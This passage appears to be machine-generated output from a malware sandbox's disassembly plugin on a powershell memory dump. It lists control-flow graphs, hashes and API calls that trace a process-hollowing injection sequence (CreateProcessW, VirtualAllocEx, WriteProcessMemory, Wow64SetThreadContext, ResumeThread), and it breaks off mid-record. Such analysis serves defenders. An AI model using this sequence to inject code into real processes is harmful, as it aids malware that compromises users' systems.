10359->10340 10362 288e40 Wow64SetThreadContext 10360->10362 10363 288a1f 10362->10363 10363->10337 10363->10346
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 19039478a9dd814d5ae0b6d1c3503b608e6f48e80c8e6d6b21e3b8c11b797e13
                                                                              • Instruction ID: 2139f3a48ba580d9f8b4a7382b2069dacbf9fa42513d9647eb0310e50d31b6a7
                                                                              • Opcode Fuzzy Hash: 19039478a9dd814d5ae0b6d1c3503b608e6f48e80c8e6d6b21e3b8c11b797e13
                                                                              • Instruction Fuzzy Hash: 9FB2C074A1A3859FCB06DF68C494A9DBFB1BF4A310F198096E444AB3A3C734DD46CB91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 288528-2885d9 4 2885df-2885e4 0->4 5 288be4-288c79 0->5 6 2885f2 4->6 7 2885e6-2885f0 4->7 12 288c7b-288c7e 5->12 13 288c81-288c88 5->13 8 2885f7-2885f9 6->8 7->8 10 2885fb-28860d 8->10 11 288613-288636 call 2879ac 8->11 10->11 21 28863c-288651 11->21 22 288b6d-288b80 11->22 12->13 14 288c8a-288c90 13->14 15 288c93-288ca9 13->15 14->15 17 288cab-288cb1 15->17 18 288cb4-288d57 CreateProcessW 15->18 17->18 24 288d59-288d5f 18->24 25 288d60-288dd8 18->25 28 288a7e 21->28 29 288657-28867b 21->29 35 288b87-288b9d 22->35 24->25 52 288dea-288df1 25->52 53 288dda-288de0 25->53 33 288a83-288a96 28->33 29->35 39 288681-288694 call 2879b8 29->39 49 288a9d-288ab0 33->49 35->5 47 288b9f-288ba7 35->47 50 28869a-2886a4 39->50 51 288b53-288b66 39->51 61 288ba9-288bab call 286aec 47->61 62 288bb0-288bbd 47->62 73 288ab7-288aca 49->73 50->35 54 2886aa-2886c7 50->54 51->22 57 288e08 52->57 58 288df3-288e02 52->58 53->52 54->28 60 2886cd-2886e7 call 2879c4 54->60 69 288e09 57->69 58->57 71 288b39-288b4c 60->71 72 2886ed-2886f6 60->72 61->62 79 288bbf 62->79 80 288bc4-288be1 62->80 69->69 71->51 74 2886f8-28873c 72->74 75 288757-28875d 72->75 91 288ad1-288ae4 73->91 85 28873e-288744 74->85 86 288745-288751 74->86 75->28 76 288763-288773 75->76 76->28 88 288779-2887cc VirtualAllocEx 76->88 79->80 85->86 86->75 87 288b1f-288b32 86->87 87->71 94 2887ce-2887d4 88->94 95 2887d5-2887f7 88->95 110 288aeb-288afe 91->110 94->95 98 2887f9-28884b VirtualAllocEx 95->98 99 288864-28886b 95->99 103 28884d-288853 98->103 104 288854-28885e 98->104 100 288871-28888c call 2879d0 99->100 101 288b05-288b18 99->101 100->110 111 288892-28889b 100->111 101->87 103->104 104->99 110->101 111->28 113 2888a1-2888a7 111->113 113->28 114 2888ad-2888b8 113->114 114->28 118 2888be-2888c8 114->118 119 288998-2889a9 118->119 120 2888ce-2888d3 118->120 119->28 123 2889af-2889c3 call 2879d0 119->123 120->28 121 2888d9-2888ec 120->121 121->28 125 2888f2-288901 121->125 123->73 129 2889c9-2889cf 123->129 125->28 130 288907-288917 125->130 129->28 131 2889d5-2889e6 129->131 134 288919-28891c 130->134 135 28897a-28897d 130->135 136 2889e8-2889eb 131->136 137 2889f1-2889f9 131->137 134->28 139 288922-288925 134->139 135->28 138 288983-288986 135->138 136->137 137->28 140 2889ff-288a09 137->140 138->28 142 28898c-288992 138->142 139->28 143 28892b-288959 139->143 140->35 141 288a0f-288a21 call 2879dc 140->141 141->49 147 288a23-288a61 ResumeThread 141->147 142->119 142->120 143->28 152 28895f-28896d call 2879d0 143->152 148 288a6a-288a77 147->148 149 288a63-288a69 147->149 148->33 151 288a79 148->151 149->148 151->79 155 288972-288974 152->155 155->91 155->135
                                                                              APIs
                                                                              • VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040), ref: 002887B5
                                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 00288834
                                                                              • ResumeThread.KERNELBASE(?), ref: 00288A4A
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00288D44
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual$CreateProcessResumeThread
                                                                              • String ID: lX
                                                                              • API String ID: 1213262536-2093460002
                                                                              • Opcode ID: b71bf00bdc3a2dcce7567797563de4e7005a2b903b3577ae6770c4c62093db57
                                                                              • Instruction ID: edd19abb96f3753672353723c4958b2402a2249f492bd0f97e6085f6794ab44e
                                                                              • Opcode Fuzzy Hash: b71bf00bdc3a2dcce7567797563de4e7005a2b903b3577ae6770c4c62093db57
                                                                              • Instruction Fuzzy Hash: 5832C174A11218CFDB24EF64C854B9DBBB2BF84304F5481AAE419AB391DF309E94CF91

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 156 3b2cf8-3b2d1a 157 3b2d20-3b2d25 156->157 158 3b2e97-3b2ee2 156->158 159 3b2d3d-3b2d49 157->159 160 3b2d27-3b2d2d 157->160 164 3b2ee8-3b2eed 158->164 165 3b303d-3b3082 158->165 170 3b2d4f-3b2d52 159->170 171 3b2e42-3b2e4c 159->171 161 3b2d2f 160->161 162 3b2d31-3b2d3b 160->162 161->159 162->159 168 3b2eef-3b2ef5 164->168 169 3b2f05-3b2f09 164->169 180 3b3088-3b308d 165->180 181 3b322c-3b325c 165->181 173 3b2ef9-3b2f03 168->173 174 3b2ef7 168->174 178 3b2fe8-3b2ff2 169->178 179 3b2f0f-3b2f13 169->179 170->171 177 3b2d58-3b2d5f 170->177 175 3b2e5a-3b2e60 171->175 176 3b2e4e-3b2e57 171->176 173->169 174->169 184 3b2e62-3b2e64 175->184 185 3b2e66-3b2e72 175->185 177->158 186 3b2d65-3b2d6a 177->186 182 3b3000-3b3006 178->182 183 3b2ff4-3b2ffd 178->183 187 3b2f53 179->187 188 3b2f15-3b2f26 179->188 189 3b308f-3b3095 180->189 190 3b30a5-3b30a9 180->190 211 3b325e-3b327b 181->211 212 3b3295-3b329f 181->212 191 3b3008-3b300a 182->191 192 3b300c-3b3018 182->192 195 3b2e74-3b2e94 184->195 185->195 196 3b2d6c-3b2d72 186->196 197 3b2d82-3b2d86 186->197 193 3b2f55-3b2f57 187->193 188->165 216 3b2f2c-3b2f31 188->216 199 3b3099-3b30a3 189->199 200 3b3097 189->200 202 3b30af-3b30b3 190->202 203 3b31d4-3b31de 190->203 205 3b301a-3b303a 191->205 192->205 193->178 206 3b2f5d-3b2f61 193->206 208 3b2d76-3b2d80 196->208 209 3b2d74 196->209 197->171 204 3b2d8c-3b2d90 197->204 199->190 200->190 217 3b30f3 202->217 218 3b30b5-3b30c6 202->218 219 3b31ec-3b31f2 203->219 220 3b31e0-3b31e9 203->220 213 3b2d92-3b2dae 204->213 214 3b2db0 204->214 206->178 221 3b2f67-3b2f76 206->221 208->197 209->197 245 3b327d-3b328f 211->245 246 3b32e5-3b32ea 211->246 224 3b32a8-3b32ae 212->224 225 3b32a1-3b32a5 212->225 226 3b2db2-3b2db4 213->226 214->226 228 3b2f49-3b2f51 216->228 229 3b2f33-3b2f39 216->229 223 3b30f5-3b30f7 217->223 218->181 249 3b30cc-3b30d1 218->249 231 3b31f8-3b3204 219->231 232 3b31f4-3b31f6 219->232 252 3b2f78-3b2f7e 221->252 253 3b2f8e-3b2fe5 221->253 223->203 243 3b30fd-3b3101 223->243 236 3b32b0-3b32b2 224->236 237 3b32b4-3b32c0 224->237 226->171 238 3b2dba-3b2dc7 226->238 228->193 239 3b2f3b 229->239 240 3b2f3d-3b2f47 229->240 242 3b3206-3b3229 231->242 232->242 247 3b32c2-3b32e2 236->247 237->247 271 3b2dce-3b2dd0 238->271 239->228 240->228 243->203 251 3b3107-3b310b 243->251 245->212 246->245 259 3b30e9-3b30f1 249->259 260 3b30d3-3b30d9 249->260 251->203 262 3b3111-3b3137 251->262 263 3b2f82-3b2f84 252->263 264 3b2f80 252->264 259->223 267 3b30db 260->267 268 3b30dd-3b30e7 260->268 262->203 280 3b313d-3b3141 262->280 263->253 264->253 267->259 268->259 273 3b2de8-3b2e3f 271->273 274 3b2dd2-3b2dd8 271->274 277 3b2dda 274->277 278 3b2ddc-3b2dde 274->278 277->273 278->273 281 3b3143-3b314c 280->281 282 3b3164 280->282 283 3b314e-3b3151 281->283 284 3b3153-3b3160 281->284 285 3b3167-3b3174 282->285 286 3b3162 283->286 284->286 287 3b317a-3b31d1 285->287 286->285
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$@#|e$@#|e$@#|e$@#|e$@#|e
                                                                              • API String ID: 0-860154774
                                                                              • Opcode ID: d363fbd247e2ea3a4130b44ef4706e6455bec7472dcfaf3470b36036be0c2732
                                                                              • Instruction ID: f969d7413a19c8a0eaf38df26e22d3aa7f38e17361f0be563725653345045022
                                                                              • Opcode Fuzzy Hash: d363fbd247e2ea3a4130b44ef4706e6455bec7472dcfaf3470b36036be0c2732
                                                                              • Instruction Fuzzy Hash: 7BF14530B04314DFDB169F68C8447EBBBB2AF85318F25C5AAD6198BAA1DB31CE41C751

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 290 2884ae-2884da 291 2884df-2884e8 290->291 454 2884ea call 288528 291->454 455 2884ea call 2884ae 291->455 292 2884f0-2884f2 293 2884fe-288501 292->293 294 2884f4-2884fd 292->294 295 28850f-2885d9 293->295 296 288503-288506 293->296 302 2885df-2885e4 295->302 303 288be4-288c79 295->303 296->291 297 288508-28850e 296->297 304 2885f2 302->304 305 2885e6-2885f0 302->305 310 288c7b-288c7e 303->310 311 288c81-288c88 303->311 306 2885f7-2885f9 304->306 305->306 308 2885fb-28860d 306->308 309 288613-288636 call 2879ac 306->309 308->309 319 28863c-288651 309->319 320 288b6d-288b80 309->320 310->311 312 288c8a-288c90 311->312 313 288c93-288ca9 311->313 312->313 315 288cab-288cb1 313->315 316 288cb4-288d57 CreateProcessW 313->316 315->316 322 288d59-288d5f 316->322 323 288d60-288dd8 316->323 326 288a7e 319->326 327 288657-28867b 319->327 333 288b87-288b9d 320->333 322->323 350 288dea-288df1 323->350 351 288dda-288de0 323->351 331 288a83-288a96 326->331 327->333 337 288681-288694 call 2879b8 327->337 347 288a9d-288ab0 331->347 333->303 345 288b9f-288ba7 333->345 348 28869a-2886a4 337->348 349 288b53-288b66 337->349 359 288ba9-288bab call 286aec 345->359 360 288bb0-288bbd 345->360 371 288ab7-288aca 347->371 348->333 352 2886aa-2886c7 348->352 349->320 355 288e08 350->355 356 288df3-288e02 350->356 351->350 352->326 358 2886cd-2886e7 call 2879c4 352->358 367 288e09 355->367 356->355 369 288b39-288b4c 358->369 370 2886ed-2886f6 358->370 359->360 377 288bbf 360->377 378 288bc4-288be1 360->378 367->367 369->349 372 2886f8-28873c 370->372 373 288757-28875d 370->373 389 288ad1-288ae4 371->389 383 28873e-288744 372->383 384 288745-288751 372->384 373->326 374 288763-288773 373->374 374->326 386 288779-2887cc VirtualAllocEx 374->386 377->378 383->384 384->373 385 288b1f-288b32 384->385 385->369 392 2887ce-2887d4 386->392 393 2887d5-2887f7 386->393 408 288aeb-288afe 389->408 392->393 396 2887f9-28884b VirtualAllocEx 393->396 397 288864-28886b 393->397 401 28884d-288853 396->401 402 288854-28885e 396->402 398 288871-28888c call 2879d0 397->398 399 288b05-288b18 397->399 398->408 409 288892-28889b 398->409 399->385 401->402 402->397 408->399 409->326 411 2888a1-2888a7 409->411 411->326 412 2888ad-2888b8 411->412 412->326 416 2888be-2888c8 412->416 417 288998-2889a9 416->417 418 2888ce-2888d3 416->418 417->326 421 2889af-2889c3 call 2879d0 417->421 418->326 419 2888d9-2888ec 418->419 419->326 423 2888f2-288901 419->423 421->371 427 2889c9-2889cf 421->427 423->326 428 288907-288917 423->428 427->326 429 2889d5-2889e6 427->429 432 288919-28891c 428->432 433 28897a-28897d 428->433 434 2889e8-2889eb 429->434 435 2889f1-2889f9 429->435 432->326 437 288922-288925 432->437 433->326 436 288983-288986 433->436 434->435 435->326 438 2889ff-288a09 435->438 436->326 440 28898c-288992 436->440 437->326 441 28892b-288959 437->441 438->333 439 288a0f-288a21 call 2879dc 438->439 439->347 445 288a23-288a61 ResumeThread 439->445 440->417 440->418 441->326 450 28895f-28896d call 2879d0 441->450 446 288a6a-288a77 445->446 447 288a63-288a69 445->447 446->331 449 288a79 446->449 447->446 449->377 453 288972-288974 450->453 453->389 453->433 454->292 455->292
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: lX
                                                                              • API String ID: 0-2093460002
                                                                              • Opcode ID: 4ea9432bdb5a2f2f4342c2d2d7ba4486019b3874bf48dd7ecec56a4e7b24cc18
                                                                              • Instruction ID: 18f190504fcbd6671346ceba3788dcc42b15afb0ef0f71f6f8de95432526bd24
                                                                              • Opcode Fuzzy Hash: 4ea9432bdb5a2f2f4342c2d2d7ba4486019b3874bf48dd7ecec56a4e7b24cc18
                                                                              • Instruction Fuzzy Hash: E6F1B074A113188FDB24EF64CC84B99BBB2BF85344F6481AAD44CAB2D2DB709D94CF51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 456 3b2020-3b2046 457 3b204c-3b2051 456->457 458 3b21f2-3b223a 456->458 459 3b2069-3b206d 457->459 460 3b2053-3b2059 457->460 466 3b236c-3b2389 458->466 467 3b2240-3b2245 458->467 464 3b219e-3b21a8 459->464 465 3b2073-3b2075 459->465 461 3b205b 460->461 462 3b205d-3b2067 460->462 461->459 462->459 470 3b21aa-3b21b3 464->470 471 3b21b6-3b21bc 464->471 468 3b2077-3b2083 465->468 469 3b2085 465->469 473 3b225d-3b2261 467->473 474 3b2247-3b224d 467->474 475 3b2087-3b2089 468->475 469->475 476 3b21be-3b21c0 471->476 477 3b21c2-3b21ce 471->477 483 3b231e-3b2328 473->483 484 3b2267-3b2269 473->484 479 3b224f 474->479 480 3b2251-3b225b 474->480 475->464 481 3b208f-3b2093 475->481 482 3b21d0-3b21ef 476->482 477->482 479->473 480->473 489 3b20a6 481->489 490 3b2095-3b20a4 481->490 487 3b232a-3b2332 483->487 488 3b2335-3b233b 483->488 485 3b226b-3b2277 484->485 486 3b2279 484->486 492 3b227b-3b227d 485->492 486->492 494 3b233d-3b233f 488->494 495 3b2341-3b234d 488->495 497 3b20a8-3b20aa 489->497 490->497 492->483 499 3b2283-3b2285 492->499 500 3b234f-3b2369 494->500 495->500 497->464 498 3b20b0-3b20b2 497->498 501 3b20c2 498->501 502 3b20b4-3b20c0 498->502 503 3b229f-3b22a1 499->503 504 3b2287-3b228d 499->504 507 3b20c4-3b20c6 501->507 502->507 512 3b22a8-3b22aa 503->512 508 3b228f 504->508 509 3b2291-3b229d 504->509 507->464 511 3b20cc-3b20ce 507->511 508->503 509->503 513 3b20e8-3b20f3 511->513 514 3b20d0-3b20d6 511->514 516 3b22ac-3b22b2 512->516 517 3b22c2-3b231b 512->517 522 3b2102-3b210e 513->522 523 3b20f5-3b20f8 513->523 520 3b20da-3b20e6 514->520 521 3b20d8 514->521 524 3b22b6-3b22b8 516->524 525 3b22b4 516->525 520->513 521->513 526 3b211c-3b212c 522->526 527 3b2110-3b2112 522->527 523->522 524->517 525->517 530 3b212e-3b2134 526->530 531 3b2144-3b219b 526->531 527->526 532 3b2138-3b213a 530->532 533 3b2136 530->533 532->531 533->531
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$@#|e$@#|e$@#|e
                                                                              • API String ID: 0-1747165277
                                                                              • Opcode ID: ef8082deb06d8e70335330c09be04a26d7a462d9bb5543fb7f8eb456988078c8
                                                                              • Instruction ID: 19aa115b3dc280975594c2daed85c7ef89cd0d96b7d769766619ad86a09e352a
                                                                              • Opcode Fuzzy Hash: ef8082deb06d8e70335330c09be04a26d7a462d9bb5543fb7f8eb456988078c8
                                                                              • Instruction Fuzzy Hash: 2E812631B04200CFCB269F29C8002EBBBB5AFD5315B2986BBCA54DBA51DB35CD41C761

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 535 3b1298-3b12bb 536 3b12c1-3b12c6 535->536 537 3b1496-3b14b7 535->537 538 3b12c8-3b12ce 536->538 539 3b12de-3b12e2 536->539 547 3b14b9-3b14be 537->547 548 3b14e4-3b151a 537->548 540 3b12d2-3b12dc 538->540 541 3b12d0 538->541 542 3b12e8-3b12ec 539->542 543 3b1443-3b144d 539->543 540->539 541->539 545 3b12ff 542->545 546 3b12ee-3b12fd 542->546 549 3b145b-3b1461 543->549 550 3b144f-3b1458 543->550 551 3b1301-3b1303 545->551 546->551 552 3b14c0-3b14c6 547->552 553 3b14d6-3b14e3 547->553 568 3b151c 548->568 569 3b1523-3b1537 548->569 554 3b1463-3b1465 549->554 555 3b1467-3b1473 549->555 551->543 558 3b1309-3b1329 551->558 559 3b14ca-3b14d4 552->559 560 3b14c8 552->560 561 3b1475-3b1493 554->561 555->561 573 3b132b-3b1346 558->573 574 3b1348 558->574 559->553 560->553 568->569 575 3b134a-3b134c 573->575 574->575 575->543 576 3b1352-3b1354 575->576 578 3b1356-3b1362 576->578 579 3b1364 576->579 580 3b1366-3b1368 578->580 579->580 580->543 582 3b136e-3b138e 580->582 585 3b1390-3b1396 582->585 586 3b13a6-3b13aa 582->586 587 3b139a-3b139c 585->587 588 3b1398 585->588 589 3b13ac-3b13b2 586->589 590 3b13c4-3b13c8 586->590 587->586 588->586 591 3b13b6-3b13c2 589->591 592 3b13b4 589->592 593 3b13cf-3b13d1 590->593 591->590 592->590 594 3b13e9-3b1440 593->594 595 3b13d3-3b13d9 593->595 597 3b13db 595->597 598 3b13dd-3b13df 595->598 597->594 598->594
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @#|e$@#|e
                                                                              • API String ID: 0-396352711
                                                                              • Opcode ID: c6639c71e5997b5c56a6a85457db210f22693b68895c182fb87ee9defd9ab770
                                                                              • Instruction ID: 1ce8568a15b111eb3d4cd02d458be631c755e055ccb68f4a86966db3e3329100
                                                                              • Opcode Fuzzy Hash: c6639c71e5997b5c56a6a85457db210f22693b68895c182fb87ee9defd9ab770
                                                                              • Instruction Fuzzy Hash: 17614734B04301CFDB269B65D8206EA77F1AFC1314BA580AAD609CFA92EF35CD41C762

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 600 3b10d0-3b1124 605 3b1151-3b1156 600->605 606 3b1126-3b1134 600->606 605->606 609 3b113c-3b114b 606->609 609->605
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520260675.00000000003B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_3b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $;,$$;,
                                                                              • API String ID: 0-3530334740
                                                                              • Opcode ID: 7a6ced492090f34d77bb27676a8893a6309ae07962d071d9b3260d2902ee3001
                                                                              • Instruction ID: ae9120d50e8d62ed88003fddc10a387168266f59dfef4e052fe2995e310deb40
                                                                              • Opcode Fuzzy Hash: 7a6ced492090f34d77bb27676a8893a6309ae07962d071d9b3260d2902ee3001
                                                                              • Instruction Fuzzy Hash: D0F028703102086BEA2467709815F6F66D9AFD4B04F508019FA099F3C1DDB1AD008365

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 610 2879e8-2879fa 612 2879fc-287d0e 610->612 613 2879d1-2879d7 610->613 624 287d10-287d15 612->624 625 287d17-287d2f 612->625 614 288fb8-288ffe 613->614 616 289008-289041 WriteProcessMemory 614->616 617 289000-289006 614->617 620 28904a-28906b 616->620 621 289043-289049 616->621 617->616 621->620 626 287d3b-287d4b 624->626 625->626 632 287d31-287d38 625->632 630 2880ac-2880bc 626->630 631 287d51-28809e call 2878d0 call 2878e0 call 2878f0 626->631 635 2880c2-2880eb 630->635 636 288397-2883a7 630->636 776 2880a9 631->776 777 2880a0 631->777 632->626 649 2880f1-2881c1 call 286a8c 635->649 650 2881c6-288389 call 2878d0 call 2878e0 call 2878f0 635->650 642 2883a9-2883ac 636->642 643 2883b5-28842c call 284994 call 286a9c call 286aac 636->643 642->643 698 28842e-28845c 643->698 699 288477-2884a5 call 2884ae 643->699 649->650 752 28838b 650->752 753 288394 650->753 752->753 753->636 776->614 777->776
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,0647197F,00000000,?,?,?,00000000,00000000,?,0028888A,?,00000000,?), ref: 00289034
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 7bd0bb6e1dd567d57b591acaf79c39eb4ea5debb9231499b79b7fe93402c6955
                                                                              • Instruction ID: 1aa731c7fbd6b662d09127f0835820da51a0b50e6d58937f10512acdfa66d588
                                                                              • Opcode Fuzzy Hash: 7bd0bb6e1dd567d57b591acaf79c39eb4ea5debb9231499b79b7fe93402c6955
                                                                              • Instruction Fuzzy Hash: 21D1CF34A14305CFDB05AFB4D8587AE7BF2EF89300F14442EE80AA7396DB759855CBA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 779 2879ac-288c79 781 288c7b-288c7e 779->781 782 288c81-288c88 779->782 781->782 783 288c8a-288c90 782->783 784 288c93-288ca9 782->784 783->784 785 288cab-288cb1 784->785 786 288cb4-288d57 CreateProcessW 784->786 785->786 788 288d59-288d5f 786->788 789 288d60-288dd8 786->789 788->789 796 288dea-288df1 789->796 797 288dda-288de0 789->797 798 288e08 796->798 799 288df3-288e02 796->799 797->796 801 288e09 798->801 799->798 801->801
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00288D44
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: d4a88a7a71cd16c959b79b3c8e8cd0892fbbfa711c38c792eea6f8fe3790f4c2
                                                                              • Instruction ID: f637006a87f162eee88c759978591127f3ea14296ff978aebc47b3616878a227
                                                                              • Opcode Fuzzy Hash: d4a88a7a71cd16c959b79b3c8e8cd0892fbbfa711c38c792eea6f8fe3790f4c2
                                                                              • Instruction Fuzzy Hash: EE512A71D11219DFEB24CF65C940BDDBBB5BF48304F1484AAE909B7280DB719A94CFA0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 802 288fb1-288ffe 803 289008-289041 WriteProcessMemory 802->803 804 289000-289006 802->804 805 28904a-28906b 803->805 806 289043-289049 803->806 804->803 806->805
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,0647197F,00000000,?,?,?,00000000,00000000,?,0028888A,?,00000000,?), ref: 00289034
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 2fbbf430d190164a0596e5a779851c1091bfdb2a031942267aaeb53f89e713b7
                                                                              • Instruction ID: 9385abc6878bdc51c8e846a1b6728d2048e802b5cb511d4f5b9c3244f16faecb
                                                                              • Opcode Fuzzy Hash: 2fbbf430d190164a0596e5a779851c1091bfdb2a031942267aaeb53f89e713b7
                                                                              • Instruction Fuzzy Hash: 1C2114B59112499FDB10CFA9C884BEEBBF4FB49314F14842AE818A7240C3789954CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 808 2879d0-288ffe 810 289008-289041 WriteProcessMemory 808->810 811 289000-289006 808->811 812 28904a-28906b 810->812 813 289043-289049 810->813 811->810 813->812
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,0647197F,00000000,?,?,?,00000000,00000000,?,0028888A,?,00000000,?), ref: 00289034
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 1d3cc7de4aafd7ee840cdcdeb3522bf86cfb63496946472d971d646ab763f9b1
                                                                              • Instruction ID: c41e5f278cea0efe8c1decc40cb55b3a0972651743ece0856cfe5311a7529399
                                                                              • Opcode Fuzzy Hash: 1d3cc7de4aafd7ee840cdcdeb3522bf86cfb63496946472d971d646ab763f9b1
                                                                              • Instruction Fuzzy Hash: DF2107B5911309DFDB10CF9AC884BDEBBF4FB48354F54842AE918A7240D378A954CBA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 815 288e39-288e80 816 288e8c-288eb8 Wow64SetThreadContext 815->816 817 288e82-288e8a 815->817 818 288eba-288ec0 816->818 819 288ec1-288ee2 816->819 817->816 818->819
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00288692), ref: 00288EAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 997924a1d64a95e1c138db63e0cdf0b409c8e8c0f7fbf65fc950e8666c499e9f
                                                                              • Instruction ID: ff0a7ae396d24380f7e71362e2eb1055b0412b6710f31e5c1870b5d61544280b
                                                                              • Opcode Fuzzy Hash: 997924a1d64a95e1c138db63e0cdf0b409c8e8c0f7fbf65fc950e8666c499e9f
                                                                              • Instruction Fuzzy Hash: 491167B5D202498FDB10CFAAC884BDEFBF4EB89314F24852AD468A3640C3789545CFA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 821 2879b8-288e80 823 288e8c-288eb8 Wow64SetThreadContext 821->823 824 288e82-288e8a 821->824 825 288eba-288ec0 823->825 826 288ec1-288ee2 823->826 824->823 825->826
                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00288692), ref: 00288EAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.520168855.0000000000280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00280000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_280000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 85953d0c4523d52595acb0dbe46d92ba81746bac8b284a3a3aa173ed76cd050e
